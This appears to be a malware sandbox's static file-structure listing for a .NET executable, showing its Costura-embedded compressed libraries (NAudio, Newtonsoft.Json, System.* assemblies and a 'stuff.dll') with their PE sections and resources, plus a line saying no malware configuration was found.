costura.naudio.core.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.naudio.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.naudio.midi.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.naudio.wasapi.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.naudio.winforms.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
NAudio.WinForms.Gui.PanSlider.resources
$this.DefaultModifiers
$this.GridSize
$this.Language
NAudio.WinForms.Gui.VolumeSlider.resources
costura.naudio.winmm.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.newtonsoft.json.dll.compressed
[Authenticode]_a3656d89.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.stuff.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.stuff.pdb.compressed
costura.system.buffers.dll.compressed
[Authenticode]_8c38879e.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
FxResources.System.Buffers.SR.resources
costura.system.memory.dll.compressed
[Authenticode]_15ab3250.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
FxResources.System.Memory.SR.resources
costura.system.numerics.vectors.dll.compressed
[Authenticode]_ae030d4d.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
FxResources.System.Numerics.Vectors.SR.resources
costura.system.resources.extensions.dll.compressed
[Authenticode]_f4f062be.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
FxResources.System.Resources.Extensions.SR.resources
ILLink.Substitutions.xml
costura.system.runtime.compilerservices.unsafe.dll.compressed
[Authenticode]_2ce621b7.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.system.security.accesscontrol.dll.compressed
[Authenticode]_d262bb6d.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
FxResources.System.Security.AccessControl.SR.resources
costura.system.security.principal.windows.dll.compressed
[Authenticode]_20569987.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
IBC
ID:0000
ID:0
RT_VERSION
ID:0001
ID:0
.Net Resources
System.Security.Principal.Windows.xml
costura.metadata
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙